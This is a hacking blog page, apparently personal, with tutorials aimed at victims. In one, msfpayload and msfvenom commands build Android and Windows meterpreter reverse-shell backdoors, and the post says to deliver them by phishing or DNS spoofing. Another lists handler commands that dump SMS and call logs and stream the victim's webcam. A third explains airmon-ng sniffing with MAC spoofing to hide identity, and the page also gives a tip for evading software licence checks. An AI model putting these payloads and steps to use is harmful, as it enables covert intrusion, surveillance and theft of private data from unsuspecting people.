BINISHARE

Click here to edit subtitle

More
  • Home
  • News
  • Photos
  • Contact
  • Forums
  • Guestbook
  • About
Sign In or Register

"Setting up your machine to surf  and download freely and anonymously"

UNBLOCK FACEBOOK
UNBLOCK YOUTUBE
Is this dialog box annoying you. Follow the video tutorial below to fix your problems.Before everything you should first uninstall Firefox and Internet Download Manager.

visit http://binishare.webs.com for more.

you can get firefox & idm from the links below
click to download FIREFOX
click to download IDM

hold ALT while clicking download to avoid idm integration and fake serial nag. Holding ALT forces to download it with firefox.

The best way to hack android phones

Today i will share you ways to hack android phones.
prerequisites

1. Kali Linux installed 
2. phone to experiment

First thing to do open terminal.
Type the text below to generate your backdoor
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.6 R > /root/backdoor.apk

this will create an apk on the root folder. Other options to know is the LHOST  should be your local ip address and LPORT should be the port you are going to listen to. to find your LHOST open terminal and 
type  "ifconfig" inetadd will be your local ip. 

after creating this, send the backdoor to your victim. it may be through phishing plus DNS spoof or directly giving to the person itself. 
The next step is to create listening handler so that when the person opens the app the phone will be connected directly yo our PC and create a meterpreter session.

creating payload handler
- msfconsole
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST 192.168.0.6
- exploit
after this you will get a session from the phone. 

you can do
ls ------------list the files from the remote exploited phone
dump_calllog-------------dumps the call log
dump_sms -----------dumps sms on the phone
webcam_snap---------take a snapshot from the victim phone and save it to root
and finally
webcam_stream--------stream realtime video from victim phone to your pc.
 thats for today.

 

Hacking Windows pc

Today I am going to share how you can hack a windows pc using an executable payload file 

prerequisites


1. kali linux installed

2. Windows pc 


first thing is to open terminal on your kali linux machine and write the command below with out the quotation


msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.0.6 LPORT=443 -f exe > binishare.exe


after this you will find the executable on your root folder. copy this file and share this executable to the victim with whatever way you want. After this prepare the listening server.


type this on the kali linux machine terminal

  1. msfconsole use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_tcp
  3. set LHOST 192.168.0.6
  4. set LPORT 443
  5. exploit

How to use Airmon-ng 

AIRMON-NG

Today I am going to show you how to use air monitoring on kali linux. To perform you need to have

  1. As usual kali linux installed
  2. A compatible wireless card

You can see list of available compatible cards from the link below

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

3. An access point

After setting up your kali linux go to terminal and type

“airmon-ng check kill” this will help to stop buggy processes in the network manager.



First thing to do is to change your mac address to mask your identity. On terminal type

“ifconfig wlan0 down” or your wlan? Interface.

“macchanger -r wlan0”

“ifconfig wlan0 up”

Then type “airmon-ng start wlan0”, wlan0 may be different on your pc. To check list of cards, open another terminal then type “ifconfig” then see the list of cards. Mostly if you are using internal network interface card it would be wlan0. Check back to see if your monitoring mode is on.

On terminal “Ifconfig”

You should see your monitoring mode is enabled and running.

Start monitoring the air!

On terminal “airodump-ng wlan0”

The above image shows airodump-ng in action (http://3.bp.blogspot.com/-adXG9H_Xpbw/UdbvtdNEDwI/AAAAAAAAAu8/ztKB6bVptxQ/s1600/Screen2.png) pic resource from spectr3.blogspot.com

This gives you the total activities in your surrounding including list of APs and the client stations connected to. Using this information you can see how far you are from the router and how far are the clients to you. You can do many things capture live traffic for later analysis, DDos, Harvest data…

Note you can only sniff and gather data if you are in an unsecured environment, otherwise you need to have encryption key to capture in the secured traffic. I will post how gain access to encrypted wireless networks in another post.

Recent Posts

Thank you for contacting us. We will get back to you as soon as possible
Oops. An error occurred.
Click here to try again.
Create your own free website today
Webs
Better Websites Made Simple